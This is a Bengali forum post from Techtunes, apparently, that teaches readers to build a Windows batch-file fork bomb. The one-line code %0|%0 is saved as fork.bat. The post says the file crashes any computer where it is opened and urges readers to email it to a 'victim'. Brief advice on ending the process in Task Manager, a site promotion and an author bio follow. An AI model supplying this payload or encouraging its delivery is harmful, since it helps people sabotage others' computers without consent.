সবাইকে শুভেচ্ছা জানিয়ে শুরু করছি । আশা করি সকলে ভালো আছেন । আজ আপনাদের Fork Boam Virus তৈরীর পদ্ধতি শেখাব । অনেকে হয়ত জানেন । কিন্তু সকলে সবকিছু জানেন না তাই এই টিউনটা করলাম । এইটা খুব-খুব সহজ । বলতে পারেন পানির মতো সহজ । অতিরিক্ত কথা না বলে চলুন সরাসরি টিউনে যাওয়া যায় । শুধুমাত্র নিচের পদ্ধতি অনুসরন করুনঃ
.
»» »» কার্যপদ্ধতি «« ««
১। প্রথমে আপনার আপনার কম্পিউটারের নোটপ্যাড ওপেন করুন এবং এই কোডগুলো লিখুন (%0|%0)
২। এবার এটাকে .bat ফরমাটে save করুন । save করার সময় .txt মাছে ফেলুন । e.g : fork.bat [ওপেন করবেন না ]
৩। ভাইরাস তৈরী সম্পন্ন হল । এখন যদি কেউ এই ফাইলটাকে দুই বার ক্লিক করে তাহলে তার কম্পিউটারের সিস্টেম Jamm হয়ে যাবে এবং Crash করবে ।
.
»» »» NOTE «« ««
১। এখন এই ফাইলটাকে আপনার victim এর কাছে mail ও অন্যান্য মাধ্যমে পাঠাতে করতে পারবেন ।
২। কখনে .bat এই ফরম্যাটের ফাইল ওপেন করবেন না ।
৩। যদি ভুলবসত বা কারো দ্বারা এই virus এর স্বীকার হয়ে থাকেন তাহলে নিচের পদ্ধতি অনুসরন করুনঃ আপনার কম্পিউটার ওপেন করার সাথে সাথে এই কিওয়ার্ডগুলো চাপুন (Press ctrl + alt + delete key) এরপর Task Manager ওপেন করুন এবার Processes Tab এ ক্লিক করুন ও fork.bat এই রকম ফাইল খুজুন ।
এবার ফাইলটার উপর মাউস রেখে End Process বাটনে ক্লিক করুন । আপনার কাজ শেষ ।
.
.
আমার পরবর্তী পোষ্ট হবে " যেকোন সাইজের Memory Card এর স্পেসকে 4GB পর্যন্ত বৃদ্ধি করুন "
.
.
.
»» »» »» বিশেষ অনুরোধ «« «« ««
আমরা একটি বাংলাদেশী সোসিয়াল সাইট নিয়ে কাজ করছি । যেখানে পন্য সামগ্রী ক্রয়-বিক্রয়, ফোরাম, PHP স্ক্রিপ্ট, বন্ধুদের সাথে video chat করার ব্যবস্থা ইত্যাদি আছে । আমাদের সাইট দেখতে [এখানে ভিজিট]
করুন ।
টিউনটি কেমন লাগল তা জানাতে ভুলবেন না ।
আমি Pain-Killer। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 12 বছর 6 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 20 টি টিউন ও 24 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
Excellent.